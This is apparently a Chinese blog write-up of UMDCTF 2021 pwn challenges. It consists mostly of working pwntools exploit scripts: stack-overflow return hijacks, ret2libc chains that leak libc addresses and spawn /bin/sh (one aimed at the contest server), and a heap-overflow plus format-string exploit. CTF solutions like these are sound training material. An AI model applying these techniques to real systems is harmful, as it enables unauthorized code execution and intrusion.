6道pwn题,4道可以做。剩下一道题是arm架构,一道题是内核,溜了溜了。

Jump_Not_Easy

 1 from pwn import *

 2

 3 p = process('./pwn')

 4 elf = ELF('./pwn')

 5 context.log_level = 'debug'

 6

 7 def duan():

 8     gdb.attach(p)

 9     pause()

10

11 payload = 'a'*0x40+'bbbbbbbb'+p64(0x040125D)

12 p.sendlineafter('go?\n',payload)

13 p.recv()

Jump_Is_Easy

  system怎么也打不通,加了个ret才打通,估计又是栈对齐的问题(猜的)。

 1 from pwn import *

 2 from LibcSearcher import *

 3

 4 p = process('./pwn')

 5 elf = ELF('./pwn')

 6 context.log_level = 'debug'

 7

 8 def duan():

 9     gdb.attach(p)

10     pause()

11

12 pop_rdi = 0x004012c3

13 ret = 0x0040101a

14 fun_got = elf.got['__libc_start_main']

15 puts_plt = elf.plt['puts']

16 main = elf.symbols['main']

17

18 payload = 'a'*0x40+'bbbbbbbb'

19 payload+= p64(pop_rdi)+p64(fun_got)

20 payload+= p64(puts_plt)+p64(main)

21

22 p.sendlineafter('go?\n',payload)

23 fun_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))

24 libc = LibcSearcher("__libc_start_main", fun_addr)

25 libc_base = fun_addr-libc.dump("__libc_start_main")

26 system = libc_base+libc.dump("system")

27 binsh = libc_base+libc.dump("str_bin_sh")

28 print 'system-->'+hex(system)

29 print 'binsh-->'+hex(binsh)

30 print 'libc_base-->'+hex(libc_base)

31

32 payload = 'a'*0x40+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)

33 p.sendlineafter('go?\n',payload)

34 p.interactive()

Jump_Not_Working

  感觉和上一题一样...

 1 from pwn import *

 2 from LibcSearcher import *

 3

 4 p = process('./pwn')

 5 p = remote('chals5.umdctf.io',7004)

 6 elf = ELF('./pwn')

 7 context.log_level = 'debug'

 8

 9 def duan():

10     gdb.attach(p)

11     pause()

12

13 pop_rdi = 0x004012c3

14 ret = 0x0040101a

15 fun_got = elf.got['__libc_start_main']

16 puts_plt = elf.plt['puts']

17 main = elf.symbols['main']

18

19 payload = 'a'*0x40+'bbbbbbbb'

20 payload+= p64(pop_rdi)+p64(fun_got)

21 payload+= p64(puts_plt)+p64(main)

22

23 p.sendlineafter('go?\n',payload)

24 fun_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))

25 libc = LibcSearcher("__libc_start_main", fun_addr)

26 libc_base = fun_addr-libc.dump("__libc_start_main")

27 system = libc_base+libc.dump("system")

28 binsh = libc_base+libc.dump("str_bin_sh")

29 print 'system-->'+hex(system)

30 print 'binsh-->'+hex(binsh)

31 print 'libc_base-->'+hex(libc_base)

32

33 payload = 'a'*0x40+'bbbbbbbb'+p64(pop_rdi)+p64(binsh)+p64(system)

34 p.sendlineafter('go?\n',payload)

35 p.interactive()

Jump_Is_Found

  堆溢出+格式化字符串漏洞,不知道为什么打不了got表。仔细分析代码就可以出。

 1 from pwn import *

 2 from LibcSearcher import *

 3

 4 p = process('./pwn')

 5 elf = ELF('./pwn')

 6 context(os='linux',arch='amd64',log_level='debug')

 7

 8 def duan():

 9     gdb.attach(p)

10     pause()

11

12 payload = 'a'*0x100+p64(0)+p64(0x111)+'%51$p'

13 p.sendlineafter('CONSOLE> ',payload)

14 p.recvuntil('location: ')

15 fun_got = int(p.recv(14),16)-231

16

17 libc = LibcSearcher("__libc_start_main",fun_got)

18 libc_base = fun_got-libc.dump("__libc_start_main")

19 system = libc_base+libc.dump("system")

20 binsh = libc_base+libc.dump("str_bin_sh")

21 print 'libc_base-->'+hex(libc_base)

22 print 'system-->'+hex(system)

23

24 payload = '1'.ljust(0x100,'a')+p64(0)+p64(0x111)+'/bin/sh\x00'.ljust(0x100,'a')+p64(0)+p64(0x21)+p64(system)*3

25 p.sendlineafter('CONSOLE> ',payload)

26 p.interactive()

总结

  第一次做国外的比赛,感觉还算友好。

UMDCTF 2021的更多相关文章

  1. codevs 2021 中庸之道

    2021 中庸之道  时间限制: 1 s  空间限制: 128000 KB  题目等级 : 钻石 Diamond       题目描述 Description 给定一个长度为N的序列,有Q次询问,每次 ...

  2. Bzoj 1982: [Spoj 2021]Moving Pebbles 博弈论

    1982: [Spoj 2021]Moving Pebbles Time Limit: 10 Sec  Memory Limit: 64 MBSubmit: 130  Solved: 88[Submi ...

  3. poj 2021 Relative Relatives(暴力)

    题目链接:http://poj.org/problem?id=2021 思路分析:由于数据较小,采用O(N^2)的暴力算法,算出所有后代的年龄,再排序输出. 代码分析: #include <io ...

  4. iPhone屏蔽IOS更新、iPhone系统更新的提示(免越狱,有效期更新至2021年)

    iPhone屏蔽IOS更新.iPhone系统更新的提示(免越狱,有效期更新至2021年) 1.在Safari浏览器中粘贴如下链接,按提示打开链接. 输入http://apt.dataage.pub 2 ...

  5. HDU 2021 发工资咯:)

    http://acm.hdu.edu.cn/showproblem.php?pid=2021 Problem Description 作为杭电的老师,最盼望的日子就是每月的8号了,因为这一天是发工资的 ...

  6. Math.abs(~2020) 按位取反后的绝对值是多少 2021, 按位取反后,比正数多1

    Math.abs(~2020)  按位取反后的绝对值是多少 2021, 按位取反后,比正数多1 int 值的取值 范围:   -128 ---  127   之间, 0000 0000     按位取 ...

  7. 部分PR回写的数量带有小数,分别是2023工厂的纸箱104007000389,2021工厂的纸盒404002005930;

    描述:部分PR回写的数量带有小数,分别是2023工厂的纸箱104007000389,2021工厂的纸盒404002005930: 原因:所有物料规划PR时对舍入值的先后考虑逻辑影响到回写出来的temp ...

  8. codves 2021中庸之道

    2021 中庸之道 http://codevs.cn/problem/2021/ 题目描述 Description 给定一个长度为N的序列,有Q次询问,每次询问区间[L,R]的中位数. 数据保证序列中 ...

  9. HDU 2021 发工资咯:)(最水贪心)

    传送门: http://acm.hdu.edu.cn/showproblem.php?pid=2021 发工资咯:) Time Limit: 2000/1000 MS (Java/Others)    ...

随机推荐

  1. python实现圆检测

    目录: (一)霍夫圆检测原理 (二)代码实现 (一)霍夫圆检测原理 (二)代码实现 1 #霍夫圆检测 2 import cv2 as cv 3 import numpy as np 4 5 def d ...

  2. [luogu7599]雨林跳跃

    为了方便,令$a_{0}=a_{n+1}=\infty$,另外$a_{i}$是两两不同的 记$L_{x}$和$R_{x}$分别为$x$左右两侧第一个比$a_{x}$大的元素位置,可以$o(n)$预处理 ...

  3. [loj3278]收获

    人的移动之间会相互影响,因此不妨看成果树逆时针移动,显然果树之间独立 考虑建图:1.每一棵果树向其逆时针旋转后第一个人连边:2.每一个人向其逆时针旋转不小于$C$的第一个人连边(即下一个摘的人),边权 ...

  4. C#中使用protobuf-net进行序列化

    前一篇文章我们看到使用Google.Protobuf有诸多不便(参考<如何在C#中使用Google.Protobuf工具>),这次我们来看看另一个工具的使用体验. 相关资料.链接: git ...

  5. 【JavaSE】字符编码和存储编码

    字符编码和存储编码 2019-07-15  22:34:51  by冲冲 1. 英文字母和中文汉字在不同字符集编码下的字节数不同. 英文字母 字节数 : 1; 编码:GB2312 字节数 : 1; 编 ...

  6. spring boot的mybatis开启日志

    logging: level: com: xxx: xxxx: xxxx: mapper: DEBUG logging.level.mapper对应的包名=DEBUG

  7. 关于前端项目cookie的获取

    最近项目在做切换,2.0要升级到3.0,遇到跨域问题,使用的是nginx 进行对端口拦截请求其他地址,另外有的服务还要登录权限,之前没看到有这个,后来加上获取cookie的请求 var v3_toke ...

  8. ElasticJob分布式任务调度应用v2.5.2

    为何要使用分布式任务调度 **本人博客网站 **IT小神 www.itxiaoshen.com 演示项目源码地址** https://gitee.com/yongzhebuju/spring-task ...

  9. BehaviorTree.CPP行为树BT的介绍(一)

    节点类型 ControlNode是可以具有1到N个子节点的节点.一旦接收到tick,tick可以传播到一个或多个子节点. DecoratorNodes与ControlNode相似,但只能有一个子节点. ...

  10. 洛谷 P6349 - [PA2011]Kangaroos(KDT+标记下放)

    洛谷题面传送门 KDT 上打标记的 hot tea. 考虑将询问 \(A,B\) 看作二维平面直角坐标系上的一个点 \((A,B)\),那么我们这样考虑,我们从左到右扫过全部 \(n\) 个区间并开一 ...